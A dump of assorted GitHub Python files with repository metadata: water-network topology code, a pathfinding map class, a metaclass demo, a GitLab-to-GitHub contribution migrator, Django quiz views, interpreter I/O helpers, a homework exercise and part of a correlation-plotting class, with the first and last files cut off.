* len(wn.links)\n links2 = [0] * len(wn.links)\n utype = [('Pipe',0)] * npipe\n dtype = [('Pipe',0)] * npipe\n\n # Adjcant pipes for each pipe IN:+; OUT:-\n for _, link in wn.links():\n pn = link.id\n links1[int(pn)-1] = [int(p['id'])\n for _, attr in G.pred[link.start_node_name].items()\n for _,p in attr.items()\n if p['id'] != pn]\n\n for _, attr in G.succ[link.start_node_name].items() :\n for _,p in attr.items():\n if p['id'] != pn:\n links1[int(pn)-1].append(-1* int(p['id']))\n\n\n # right (end) adjcant pipes\n links2[int(pn)-1] = [int(p['id'])\n for _, attr in G.pred[link.end_node_name].items()\n for _,p in attr.items()\n if p['id'] != pn]\n\n for _, attr in G.succ[link.end_node_name].items():\n for _,p in attr.items():\n if p['id'] != pn:\n links2[int(pn)-1].append(-1*int(p['id']))\n\n #figure out downstream type and upstream type\n for _,pipe in wn.pipes():\n pn = pipe.id-1\n if links1[pn] :\n if max(map(abs, links1[pn])) > npipe:\n utype[pn] = [(l.link_type,l.name)\n for _,l in wn.links()\n if l.id == abs(links1[pn][0])][0]\n\n if links1[abs(links1[pn][0])-1] and links2[abs(links1[pn][0])-1]:\n links1[pn] = [i\n for i in [links1[abs(links1[pn][0])-1], links2[abs(links1[pn][0])-1]]\n if abs(i[0]) -1 != pn][0]\n else:\n links1[pn] = ['End']\n\n else:\n utype[pn] = (wn.nodes[pipe.start_node_name].transient_node_type,\n wn.nodes[pipe.start_node_name])\n\n if links2[pn] :\n if max(map(abs, links2[pn])) > npipe:\n dtype[pn] = [(l.link_type,l.name)\n for _,l in wn.links()\n if l.id == abs(links2[pn][0])][0]\n\n if links1[abs(links2[pn][0])-1] and links2[abs(links2[pn][0])-1]:\n links2[pn] = [i\n for i in [links1[abs(links2[pn][0])-1], links2[abs(links2[pn][0])-1]]\n if abs(i[0]) -1 != pn][0]\n else:\n links2[pn] = ['End']\n\n else:\n dtype[pn] = (wn.nodes[pipe.end_node_name].transient_node_type,\n wn.nodes[pipe.end_node_name])\n\n return links1, links2, utype, 
dtype","repo_name":"glorialulu/TSNet","sub_path":"tsnet/network/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"71"}
+{"seq_id":"44859195193","text":"\n\"\"\"Karttaruutu ja algoritmit hakevat kartat täältä\n kartta palautetaan yhden funktion avulla\n\"\"\"\n\nclass Kartat:\n\n def __init__(self):\n \"\"\"Alustetaan kolme käytössä olevaa karttaa ja\n testissä oleva kartta\n \"\"\"\n self.map1 = [\n \"ooopoooppo\",\n \"oooppooopo\",\n \"ppopoppopo\",\n \"opopoooopo\",\n \"oooppooooo\",\n \"oooooooopp\",\n \"ooooppoopo\",\n \"oopoopoooo\",\n \"ooopooopoo\",\n \"ooppoooppo\"]\n self.map2 = [\n \"opoooooopoooooo\",\n \"opoppppopppppop\",\n \"ooopoooopoooooo\",\n \"opoooppppoppppp\",\n \"opopopooooooooo\",\n \"opopoooppoopppo\",\n \"ooopppppooopooo\",\n \"ppopopopppppopp\",\n \"opooopooooooopo\",\n \"opopoooopoopopo\",\n \"oppppppoppppppo\",\n \"oopooopoooooooo\",\n \"pooopooooppppoo\",\n \"poppppopopoopop\",\n \"oopoooopoppoooo\"]\n self.map3 = [\n \"opoooooopooooooooooo\",\n \"oooooopoppppopppppop\",\n \"opopooooooooopoooooo\",\n \"opoooppppooooooppppp\",\n \"opopopoooooooooooooo\",\n \"opoooopopoooppoopppo\",\n \"opopppoooooopooopooo\",\n \"ppopppppopppppoppppp\",\n \"opooopooooooopoooooo\",\n \"ooopoppppppoopoopopo\",\n \"oppppopoooppoppppppo\",\n \"oopooopooooooooooooo\",\n \"pooopoooopppppoooooo\",\n \"pooooooppppopppoooop\",\n \"oooooopopooooooopooo\",\n \"oppppoooooppoppppppo\",\n \"oopooopoooooopoooooo\",\n \"pooopoooopopppoooooo\",\n \"poooppppppoooopoopoo\",\n \"oopooooooooopooooppo\"]\n self.map_test = [\"oo\", \"oo\"]\n\n def maps(self, map_number):\n \"\"\"Funktio kartan palauttamista varten.\n Kutsutaan kartan numerolla ja palautetaan vastaava kartta\n \"\"\"\n if map_number == 1:\n return self.map1\n if map_number == 2:\n return self.map2\n if map_number == 3:\n return self.map3\n return self.map_test\n","repo_name":"hartonenolli/Reitinhaku_TiRa","sub_path":"src/kartat/kartta1.py","file_name":"kartta1.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"15927938437","text":"from collections import abc\n\n\nclass Meta(type):\n def some_method(cls):\n return \"some_string\"\n\n\nclass Something(metaclass=Meta):\n attr = 42\n\n\nclass WithoutMeta():\n pass\n\n\nprint(type(Something)) # \nprint(type(Meta)) # \nprint(type(WithoutMeta)) # \nprint(Something.some_method())\n# print(Something().some_method()) # AttributeError: 'Something' object has no attribute 'some_method'\nprint(issubclass(list, abc.Sequence)) # True\nprint(isinstance([], abc.Hashable)) # False\n\n\ndef flatten(obj):\n for item in obj:\n if isinstance(item, abc.Iterable):\n yield from flatten(item)\n else:\n yield item","repo_name":"q3dm17/python","sub_path":"tools/metaclasses_tests.py","file_name":"metaclasses_tests.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"3942597801","text":"#!/usr/bin/python\nfrom urllib.request import urlopen, Request\nfrom tqdm import tqdm\nimport os, collections, ssl, sys, json\n\n# States\nSTATE_INIT = 'Fetching GitLab events...'\nSTATE_EMPTY = 'Could not fetch events. Do you have commits or a public profile?'\nSTATE_LOAD = 'Creating commits...'\nSTATE_DONE = 'Done!\\nGitHub status:'\nGIT_STATUS = 'git status --ahead-behind'\n\n# Values\nCOUNTER = 'i'\nCOMMITS_COUNT = 'commitsCount'\nCOMMIT_FILE = 'commit.md'\nDATE_FORMAT = '%Y-%m-%d'\nLAST_COMMIT = 'lastCommit'\nREAD = 'r'\nUNIX_EPOCH = '1970-01-01'\nUSER = 'user'\nUSER_AGENT_KEY = 'User-Agent'\nUSER_AGENT_VALUE = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'\n\n# OS\nWINDOWS_NAME = 'nt'\nWINDOWS_DUMP_PATH = 'NUL'\nWINDOWS_SETTER = 'set'\nUNIX_DUMP_PATH = '/dev/null'\nUNIX_SETTER = 'export'\n\n# Errors\nERROR_FETCH_DATA = '''Could not fetch data from user {}\nAre you sure that your user is correct and profile is public?'''\nERROR_ARGUMENTS = '''Arguments are wrong! Try running:\nmigrator.py [initialDate]\nusername: GitLab public username profile\ninitialDate(optional): Start commit date in YYYY-MM-DD format'''\n\ndef main(argv):\n print(STATE_INIT)\n profile = Profile.build(argv)\n\n if not profile.events:\n print(STATE_EMPTY)\n return\n\n print(STATE_LOAD)\n profile.createCommits()\n\n print(STATE_DONE)\n os.system(GIT_STATUS)\n\nclass Profile:\n def __init__(self, user, baseEvent):\n self.user = user\n self.baseEvent = baseEvent\n self.fetchEvents()\n \n @classmethod\n def build(self, args):\n try:\n if os.path.exists(COMMIT_FILE):\n # Read data from md file\n return Profile.fromLocal()\n else:\n # Get data from arguments\n return Profile.fromArgs(args)\n except:\n print(ERROR_ARGUMENTS)\n exit()\n \n @classmethod\n def fromLocal(self):\n file = open(COMMIT_FILE, READ)\n data = json.loads(file.read())\n \n args = []\n # Parse json into list of args\n for item in data:\n args.append(item)\n\n return Profile.fromArgs(args)\n \n @classmethod\n def fromArgs(self, args):\n user = args[1]\n baseEvent = Event.fromArgs(args)\n \n return Profile(user, baseEvent)\n\n def fetchEvents(self):\n # Sign default certificate to allow https request\n ssl._create_default_https_context = ssl._create_unverified_context\n\n # Headers to pass GitLab validation simulating a browser\n headers = { USER_AGENT_KEY : USER_AGENT_VALUE }\n \n # URL to fetch user commits data from calendar.json\n url = f'https://gitlab.com/users/{self.user}/calendar.json'\n\n try:\n # Send request from URL and Headers\n request = urlopen(Request(url = url, headers = headers))\n \n # Fetch successful decoded response\n response = request.read().decode()\n\n # Dump response into python object\n data = json.loads(response)\n except:\n print(ERROR_FETCH_DATA.format(self.user))\n exit()\n \n events = self.parseResponse(data.items())\n \n self.events = sorted(events)\n \n def parseResponse(self, items):\n events = []\n # Parse json into list of Events\n for date, count in items:\n event = Event(date, count)\n baseEvent = self.baseEvent\n\n if baseEvent > event:\n # Filter events before point zero event\n continue\n\n if baseEvent == event:\n # Remove already commited contributions\n event.commitsCount -= baseEvent.commitsCount\n \n events.append(event)\n\n return events\n \n def createCommits(self):\n for event in tqdm(self.events):\n event.createCommits(self.user)\n \nclass Event:\n def __init__(self, date = UNIX_EPOCH, count = 0):\n self.dateString = 
date \n self.commitsCount = count\n\n def __eq__(self, other):\n return self.dateString == other.dateString\n\n def __lt__(self, other):\n return self.dateString < other.dateString\n\n @classmethod\n def fromArgs(self, args):\n if len(args) == 4:\n return Event(args[2], args[3])\n \n if len(args) == 3:\n return Event(args[2])\n \n return Event()\n \n def createCommits(self, user):\n # Get dump path variable to hide commit messages based on OS\n dumpPath = WINDOWS_DUMP_PATH if os.name == WINDOWS_NAME else UNIX_DUMP_PATH\n\n for i in range(self.commitsCount):\n message = self.toMessage(user, i + 1)\n \n # Echo message into md to enable commit of modified file\n os.system(f'echo {json.dumps(message)} >> {COMMIT_FILE}')\n\n # Add file and do commit to GitHub\n os.system(f'git add {COMMIT_FILE}')\n os.system(f'git commit --date=\"{self.dateString} 12:00:00\" -m \"{message}\" > {dumpPath}')\n\n\n def toMessage(self, user, i):\n data = {}\n data[COUNTER] = i\n data[USER] = user\n data[LAST_COMMIT] = self.dateString\n data[COMMITS_COUNT] = self.commitsCount\n \n return json.dumps(data)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"ericloureiro/gitlab-contribution-migration-tool","sub_path":"migrator.py","file_name":"migrator.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"1956274811","text":"from django.shortcuts import render, get_object_or_404\n\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom django.utils import simplejson\n\nfrom grammar.models import Grammar,Choice\n\nimport collections\n\ndef index(request):\n return render(request, 'grammar/base.html')\n\ndef list(request):\n grammar_list = Grammar.objects.all().order_by('-pub_date')\n context = {'grammar_list': grammar_list}\n return render(request, 'grammar/list.html', context)\n\ndef ajaxList(request):\n grammar_list = Grammar.objects.all().order_by('-pub_date')\n results={}\n next = Grammar.objects.order_by('?')[0]\n shuffle=next.pk\n nlist=[]\n plist=[]\n count=0\n for item in grammar_list:\n nlist.append(item.nick)\n plist.append(item.pk)\n count+=1\n results['count']=count\n results['nicks']=nlist\n results['pks']=plist\n results['shuffle']=shuffle\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')\n\ndef ajaxDetail(request, grammar_id):\n return render(request, 'grammar/base.html', {'id':grammar_id})\n\ndef detail(request, grammar_id):\n grammar_sel = get_object_or_404(Grammar, pk=grammar_id)\n pk=grammar_sel.pk\n return render(request, 'grammar/view.html', {'id':pk})\n\ndef detailJSON(request, grammar_id):\n results = {'success':False}\n grammar_sel = get_object_or_404(Grammar, pk=grammar_id)\n choices = grammar_sel.choice_set.all()\n alist=[]\n clist=[]\n ilist=[]\n chara='A'\n for choice in choices:\n alist.append(chara)\n clist.append(choice.choice_text)\n ilist.append(choice.pk)\n chara=chr(ord(chara) + 1)\n next = Grammar.objects.order_by('?')[0]\n while next == grammar_sel:\n next = Grammar.objects.order_by('?')[0]\n results['next']=next.pk\n results['nickname'] = grammar_sel.nick\n results['question_1st'] = grammar_sel.question_1st\n results['question_2nd'] = grammar_sel.question_2nd\n results['labels'] = alist\n results['choices'] = clist\n results['choices_id'] = ilist\n\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')\n\ndef choose(request,pk):\n results = {'success':False}\n answer = False;\n choice = get_object_or_404(Choice, pk=pk)\n if choice.is_correct:\n answer = True\n results['answer'] = answer\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')","repo_name":"andyfangdzarchive/My-SAT-Life","sub_path":"grammar/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4124530477","text":"from typing import cast\nfrom utils import print_error, check_number_of_args, cast_value\nimport sys\n\ndef read_id(instr, ids):\n \"\"\"\n Reads a boolean or integer literal.\n If introduced type is incorrect, will ignore and report an error.\n \"\"\"\n\n # check that we have an id to store the value\n if not check_number_of_args(instr, 2):\n return\n \n # look for id\n id = instr[1]\n\n # get user input\n value = input(f'Por favor, ingrese un valor para el identificador {id}. ' +\n '(Entero o true/false): ')\n\n # check if the entered value has a valid type\n casted_value = cast_value(value)\n if casted_value == None:\n print_error('El valor introducido no es un literal entero o booleano.' + \\\n f' Valor: {value}')\n return\n\n # assign the value to the id\n ids[id] = casted_value\n\ndef print_id(instr, ids):\n \"\"\"\n Prints the value that has been assigned to an id.\n If no value has been assigned, ignores and reports an error.\n \"\"\"\n\n # check that we have an id print a value\n if len(instr) < 2:\n print(f'Instrucción inválida. Instrucción {instr}')\n return\n\n # gets the id\n id = instr[1]\n\n # checks if the has a value\n if not id in ids or ids[id] == None:\n print_error('No ha sido asignado ningún valor para este identificador.' + \\\n f' Identificador: {id}')\n else:\n print(f'\\033[1;37mIdentificador:\\033[0m {id}, \\033[1;37mValor:\\033[0m {ids[id]}')\n","repo_name":"mfaria724/ci4721-exam2","sub_path":"pregunta6/io_instr.py","file_name":"io_instr.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"25622346142","text":"# Напишите программу, которая найдёт произведение пар чисел списка.\n# Парой считаем первый и последний элемент, второй и предпоследний и т.д.\n# in\n# 4\n# out\n# [2, 5, 8, 10]\n# [20, 40]\n# in\n# 5\n# out\n# [2, 2, 4, 8, 8]\n# [16, 16, 4]\n\nfrom random import sample\nnum = int(input('Введите количество элементов: '))\nnew_list = sample (range (1, num * 2), num)\nprint(new_list)\n\ndef product_of_numbers (num_list):\n new_numbers = []\n for i in range (len(num_list) // 2):\n new_numbers.append (num_list[i] * num_list[-1 - i])\n if len(num_list) % 2 != 0:\n new_numbers.append (num_list[len(num_list) // 2])\n return new_numbers\n else:\n return new_numbers\n \nnew_num_list = product_of_numbers (new_list)\nprint (new_num_list)","repo_name":"kolosova-anna/python","sub_path":"homework_3/hw_32.py","file_name":"hw_32.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"36783529850","text":"import sys\nimport itertools\nimport copy\nimport numpy as np\nimport scipy.cluster.hierarchy as sch\nimport scipy.stats\nimport matplotlib as mpl\nmpl.use('Agg')\nmpl.rcParams['pdf.fonttype'] = 42\nmpl.rcParams['svg.fonttype'] = 'none'\nfrom deeptools import cm # noqa: F401\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.ticker\nimport matplotlib.mlab\nimport matplotlib.markers\nimport matplotlib.colors as pltcolors\nfrom deeptools.utilities import toString, convertCmap\n\nimport plotly.offline as offline\nimport plotly.graph_objs as go\nimport plotly.figure_factory as ff\n\n\nold_settings = np.seterr(all='ignore')\n\n\nclass Correlation:\n \"\"\"\n class to work with matrices\n having sample data\n to compute correlations, plot\n them and make scatter plots\n \"\"\"\n\n def __init__(self, matrix_file,\n corr_method=None,\n labels=None,\n remove_outliers=False,\n skip_zeros=False,\n log1p=False):\n\n self.load_matrix(matrix_file)\n self.skip_zeros = skip_zeros\n self.corr_method = corr_method\n self.corr_matrix = None # correlation matrix\n self.column_order = None\n self.rowCenter = False\n if labels is not None:\n # test that the length of labels\n # corresponds to the length of\n # samples\n\n self.labels = labels\n self.labels = [toString(x) for x in self.labels]\n\n if self.matrix.shape[1] == 1:\n # There's nothing that can be done with a single sample\n sys.exit(\"\\nPlease use a matrix with more than one sample\\n\")\n\n if skip_zeros is True:\n # remove rows containing only nans or zeros\n # that could be unmappable regions.\n self.remove_rows_of_zeros()\n\n if remove_outliers is True:\n # remove outliers, otherwise outliers will produce a very\n # high pearson correlation. Unnecessary for spearman correlation\n self.remove_outliers()\n\n if log1p is True:\n self.matrix = np.log1p(self.matrix)\n\n if corr_method:\n self.compute_correlation()\n\n def load_matrix(self, matrix_file):\n \"\"\"\n loads a matrix file saved using the numpy\n savez method. Two keys are expected:\n 'matrix' and 'labels'. The matrix should\n contain one sample per row\n \"\"\"\n\n _ma = np.load(matrix_file)\n # matrix: cols correspond to samples\n self.matrix = np.asarray(_ma['matrix'].tolist())\n if np.any(np.isnan(self.matrix)):\n num_nam = len(np.flatnonzero(np.isnan(self.matrix.flatten())))\n sys.stderr.write(\"*Warning*. {} NaN values were found. They will be removed along with the \"\n \"corresponding bins in other samples for the computation \"\n \"and plotting\\n\".format(num_nam))\n\n self.matrix = np.ma.compress_rows(np.ma.masked_invalid(self.matrix))\n\n self.labels = list(map(toString, _ma['labels']))\n\n assert len(self.labels) == self.matrix.shape[1], \"ERROR, length of labels is not equal \" \\\n \"to length of matrix samples\"\n\n @staticmethod\n def get_outlier_indices(data, max_deviation=200):\n \"\"\"\n The method is based on the median absolute deviation. See\n Boris Iglewicz and David Hoaglin (1993),\n \"Volume 16: How to Detect and Handle Outliers\",\n The ASQC Basic References in Quality Control:\n Statistical Techniques, Edward F. 
Mykytka, Ph.D., Editor.\n\n returns the list, without the outliers\n\n The max_deviation=200 is like selecting a z-score\n larger than 200, just that it is based on the median\n and the median absolute deviation instead of the\n mean and the standard deviation.\n \"\"\"\n median = np.median(data)\n b_value = 1.4826 # value set for a normal distribution\n mad = b_value * np.median(np.abs(data))\n outliers = []\n if mad > 0:\n deviation = abs(data - median) / mad\n \"\"\"\n outliers = data[deviation > max_deviation]\n print \"outliers removed {}\".format(len(outliers))\n print outliers\n \"\"\"\n outliers = np.flatnonzero(deviation > max_deviation)\n return outliers\n\n def remove_outliers(self, verbose=True):\n \"\"\"\n get the outliers *per column* using the median absolute\n deviation method\n\n Returns the filtered matrix\n \"\"\"\n\n unfiltered = len(self.matrix)\n to_remove = None\n for col in self.matrix.T:\n outliers = self.get_outlier_indices(col)\n if to_remove is None:\n to_remove = set(outliers)\n else:\n # only set to remove those bins in which\n # the outliers are present in all cases (colums)\n # that's why the intersection is used\n to_remove = to_remove.intersection(outliers)\n if len(to_remove):\n to_keep = [x for x in range(self.matrix.shape[0])\n if x not in to_remove]\n self.matrix = self.matrix[to_keep, :]\n if verbose:\n sys.stderr.write(\n \"total/filtered/left: \"\n \"{}/{}/{}\\n\".format(unfiltered,\n unfiltered - len(to_keep),\n len(to_keep)))\n\n return self.matrix\n\n def remove_rows_of_zeros(self):\n # remove rows containing all zeros or all nans\n _mat = np.nan_to_num(self.matrix)\n to_keep = _mat.sum(1) != 0\n\n self.matrix = self.matrix[to_keep, :]\n\n def save_corr_matrix(self, file_handle):\n \"\"\"\n saves the correlation matrix\n \"\"\"\n if self.column_order:\n self.corr_matrix = self.corr_matrix[:, self.column_order][self.column_order]\n self.labels = [self.labels[i] for i in self.column_order]\n\n self.labels = [toString(x) for x in self.labels]\n file_handle.write(\"\\t'\" + \"'\\t'\".join(self.labels) + \"'\\n\")\n fmt = \"\\t\".join(np.repeat('%.4f', self.corr_matrix.shape[1])) + \"\\n\"\n i = 0\n for row in self.corr_matrix:\n file_handle.write(\n \"'%s'\\t\" % self.labels[i] + fmt % tuple(row))\n i += 1\n\n def compute_correlation(self):\n \"\"\"\n computes spearman or pearson\n correlation for the samples in the matrix\n\n The matrix should contain the values of each sample per column\n that's why the transpose is used.\n\n >>> matrix = np.array([[1, 2, 3, np.nan],\n ... [1, 2, 3, 4],\n ... [6, 4, 3, 1]]).T\n >>> np.savez_compressed(\"/tmp/test_matrix.npz\", matrix=matrix, labels=['a', 'b', 'c'])\n\n >>> c = Correlation(\"/tmp/test_matrix.npz\", corr_method='pearson')\n\n the results should be as in R\n\n >>> c.compute_correlation().filled(np.nan)\n array([[ 1. , 1. , -0.98198051],\n [ 1. , 1. , -0.98198051],\n [-0.98198051, -0.98198051, 1. 
]])\n >>> c.corr_method = 'spearman'\n >>> c.corr_matrix = None\n >>> c.compute_correlation()\n array([[ 1., 1., -1.],\n [ 1., 1., -1.],\n [-1., -1., 1.]])\n \"\"\"\n if self.corr_matrix is not None:\n return self.corr_matrix\n\n num_samples = len(self.labels)\n # initialize correlation matrix\n\n if self.corr_method == 'pearson':\n self.corr_matrix = np.ma.corrcoef(self.matrix.T, allow_masked=True)\n\n else:\n corr_matrix = np.zeros((num_samples, num_samples), dtype='float')\n # do an all vs all correlation using the\n # indices of the upper triangle\n rows, cols = np.triu_indices(num_samples)\n\n for index in range(len(rows)):\n row = rows[index]\n col = cols[index]\n corr_matrix[row, col] = scipy.stats.spearmanr(self.matrix[:, row], self.matrix[:, col])[0]\n # make the matrix symmetric\n self.corr_matrix = corr_matrix + np.triu(corr_matrix, 1).T\n\n return self.corr_matrix\n\n def plotly_correlation(self, corr_matrix, plot_filename, labels, plot_title='',\n vmax=None, vmin=None, plot_numbers=True,\n colormap='jet'):\n \"\"\"plot_correlation, but using plotly\"\"\"\n textElement = []\n for row in range(corr_matrix.shape[0]):\n trow = []\n for col in range(corr_matrix.shape[0]):\n if plot_numbers:\n trow.append(\"{:0.2f}\".format(corr_matrix[row, col]))\n else:\n trow.append('')\n textElement.append(trow)\n\n zauto = True\n if vmax is not None or vmin is not None:\n zauto = False\n\n convertedCmap = convertCmap(colormap)\n fig = ff.create_annotated_heatmap(corr_matrix, x=labels, y=labels, colorscale=convertedCmap, showscale=True, zauto=zauto, zmin=vmin, zmax=vmax, annotation_text=textElement)\n fig.layout['title'] = plot_title\n offline.plot(fig, filename=plot_filename, auto_open=False)\n\n def plot_correlation(self, plot_filename, plot_title='', vmax=None,\n vmin=None, colormap='jet', image_format=None,\n plot_numbers=False, plotWidth=11, plotHeight=9.5):\n \"\"\"\n plots a correlation using a symmetric heatmap\n \"\"\"\n num_rows = len(self.labels)\n corr_matrix = self.compute_correlation()\n # set a font size according to figure length\n if num_rows < 6:\n font_size = 14\n elif num_rows > 40:\n font_size = 5\n else:\n font_size = int(14 - 0.25 * num_rows)\n mpl.rcParams.update({'font.size': font_size})\n # set the minimum and maximum values\n if vmax is None:\n vmax = 1\n if vmin is None:\n vmin = 0 if corr_matrix .min() >= 0 else -1\n\n # Compute and plot dendrogram.\n fig = plt.figure(figsize=(plotWidth, plotHeight))\n plt.suptitle(plot_title)\n\n axdendro = fig.add_axes([0.015, 0.1, 0.1, 0.7])\n axdendro.set_axis_off()\n y_var = sch.linkage(corr_matrix, method='centroid')\n z_var = sch.dendrogram(y_var, orientation='left',\n link_color_func=lambda k: 'darkred')\n axdendro.set_xticks([])\n axdendro.set_yticks([])\n cmap = copy.copy(plt.get_cmap(colormap))\n\n # this line simply makes a new cmap, based on the original\n # colormap that goes from 0.0 to 0.9\n # This is done to avoid colors that\n # are too dark at the end of the range that do not offer\n # a good contrast between the correlation numbers that are\n # plotted on black.\n if plot_numbers:\n cmap = pltcolors.LinearSegmentedColormap.from_list(colormap + \"clipped\",\n cmap(np.linspace(0, 0.9, 10)))\n\n cmap.set_under((0., 0., 1.))\n # Plot distance matrix.\n axmatrix = fig.add_axes([0.12, 0.1, 0.6, 0.7])\n index = z_var['leaves']\n corr_matrix = corr_matrix[index, :]\n corr_matrix = corr_matrix[:, index]\n if corr_matrix.shape[0] > 30:\n # when there are too many rows it is better to remove\n # the black lines surrounding 
the boxes in the heatmap\n edge_color = 'none'\n else:\n edge_color = 'black'\n\n if image_format == \"plotly\":\n self.plotly_correlation(corr_matrix,\n plot_filename,\n self.labels,\n plot_title=plot_title,\n vmax=vmax,\n vmin=vmin,\n colormap=colormap,\n plot_numbers=plot_numbers)\n return\n\n img_mat = axmatrix.pcolormesh(corr_matrix,\n edgecolors=edge_color,\n cmap=cmap,\n vmax=vmax,\n vmin=vmin)\n axmatrix.set_xlim(0, num_rows)\n axmatrix.set_ylim(0, num_rows)\n\n axmatrix.yaxis.tick_right()\n axmatrix.set_yticks(np.arange(corr_matrix .shape[0]) + 0.5)\n axmatrix.set_yticklabels(np.array(self.labels).astype('str')[index])\n\n axmatrix.xaxis.set_tick_params(labeltop=True)\n axmatrix.xaxis.set_tick_params(labelbottom=False)\n axmatrix.set_xticks(np.arange(corr_matrix .shape[0]) + 0.5)\n axmatrix.set_xticklabels(np.array(self.labels).astype('str')[index], rotation=45, ha='left')\n\n axmatrix.tick_params(\n axis='x',\n which='both',\n bottom=False,\n top=False)\n\n axmatrix.tick_params(\n axis='y',\n which='both',\n left=False,\n right=False)\n\n # Plot colorbar\n axcolor = fig.add_axes([0.12, 0.065, 0.6, 0.02])\n cobar = plt.colorbar(img_mat, cax=axcolor, orientation='horizontal')\n cobar.solids.set_edgecolor(\"face\")\n if plot_numbers:\n for row in range(num_rows):\n for col in range(num_rows):\n axmatrix.text(row + 0.5, col + 0.5,\n \"{:.2f}\".format(corr_matrix[row, col]),\n ha='center', va='center')\n\n self.column_order = index\n fig.savefig(plot_filename, format=image_format)\n plt.close()\n\n def plotly_scatter(self, plot_filename, corr_matrix, plot_title='', minXVal=None, maxXVal=None, minYVal=None, maxYVal=None):\n \"\"\"Make the scatter plot of a matrix with plotly\"\"\"\n n = self.matrix.shape[1]\n self.matrix = self.matrix\n fig = go.Figure()\n domainWidth = 1. 
/ n\n\n annos = []\n for i in range(n):\n x = domainWidth * (i + 1)\n y = 1 - (domainWidth * i + 0.5 * domainWidth)\n anno = dict(text=self.labels[i], showarrow=False, xref='paper', yref='paper', x=x, y=y, xanchor='right', yanchor='middle')\n annos.append(anno)\n\n data = []\n zMin = np.inf\n zMax = -np.inf\n for x in range(n):\n xanchor = 'x{}'.format(x + 1)\n base = x * domainWidth\n domain = [base, base + domainWidth]\n if x > 0:\n base = 1 - base\n fig['layout']['xaxis{}'.format(x + 1)] = dict(domain=domain, range=[minXVal, maxXVal], anchor='free', position=base)\n for y in range(0, n):\n yanchor = 'y{}'.format(y + 1)\n if x == 1:\n base = 1 - y * domainWidth\n domain = [base - domainWidth, base]\n fig['layout']['yaxis{}'.format(y + 1)] = dict(domain=domain, range=[minYVal, maxYVal], side='right', anchor='free', position=1.0)\n\n if x > y:\n vector1 = self.matrix[:, x]\n vector2 = self.matrix[:, y]\n Z, xEdges, yEdges = np.histogram2d(vector1, vector2, bins=50)\n Z = np.log10(Z)\n if np.min(Z) < zMin:\n zMin = np.min(Z)\n if np.max(Z) > zMax:\n zMax = np.max(Z)\n name = '{}={:.2f}'.format(self.corr_method, corr_matrix[x, y])\n trace = go.Heatmap(z=Z, x=xEdges, y=yEdges, showlegend=False, xaxis=xanchor, yaxis=yanchor, name=name, showscale=False)\n data.append(trace)\n\n # Fix the colorbar bounds\n for trace in data:\n trace.update(zmin=zMin, zmax=zMax)\n data[-1]['colorbar'].update(title=\"log10(instances per bin)\", titleside=\"right\")\n data[-1].update(showscale=True)\n\n fig.add_traces(data)\n fig['layout'].update(title=plot_title, showlegend=False, annotations=annos)\n\n offline.plot(fig, filename=plot_filename, auto_open=False)\n\n def plot_scatter(self, plot_filename, plot_title='', image_format=None, log1p=False, xRange=None, yRange=None):\n \"\"\"\n Plot the scatter plots of a matrix\n in which each row is a sample\n \"\"\"\n\n num_samples = self.matrix.shape[1]\n corr_matrix = self.compute_correlation()\n grids = gridspec.GridSpec(num_samples, num_samples)\n grids.update(wspace=0, hspace=0)\n fig = plt.figure(figsize=(2 * num_samples, 2 * num_samples))\n plt.rcParams['font.size'] = 8.0\n plt.suptitle(plot_title)\n if log1p is True:\n self.matrix = np.log1p(self.matrix)\n min_xvalue = self.matrix.min()\n max_xvalue = self.matrix.max()\n min_yvalue = min_xvalue\n max_yvalue = max_xvalue\n if xRange is not None:\n min_xvalue = xRange[0]\n max_xvalue = xRange[1]\n if yRange is not None:\n min_yvalue = yRange[0]\n max_yvalue = yRange[1]\n if (min_xvalue % 2 == 0 and max_xvalue % 2 == 0) or \\\n (min_xvalue % 1 == 0 and max_xvalue % 2 == 1):\n # make one value odd and the other even\n max_xvalue += 1\n if (min_yvalue % 2 == 0 and max_yvalue % 2 == 0) or \\\n (min_yvalue % 1 == 0 and max_yvalue % 2 == 1):\n # make one value odd and the other even\n max_yvalue += 1\n\n # plotly output\n if image_format == 'plotly':\n self.plotly_scatter(plot_filename, corr_matrix, plot_title=plot_title, minXVal=min_xvalue, maxXVal=max_xvalue, minYVal=min_yvalue, maxYVal=max_yvalue)\n return\n\n rows, cols = np.triu_indices(num_samples)\n\n for index in range(len(rows)):\n row = rows[index]\n col = cols[index]\n if row == col:\n # add titles as\n # empty plot in the diagonal\n ax = fig.add_subplot(grids[row, col])\n ax.text(0.5, 0.5, self.labels[row],\n verticalalignment='center',\n horizontalalignment='center',\n fontsize=10, fontweight='bold',\n transform=ax.transAxes)\n ax.set_axis_off()\n continue\n\n ax = fig.add_subplot(grids[row, col])\n\n vector1 = self.matrix[:, row]\n vector2 = self.matrix[:, 
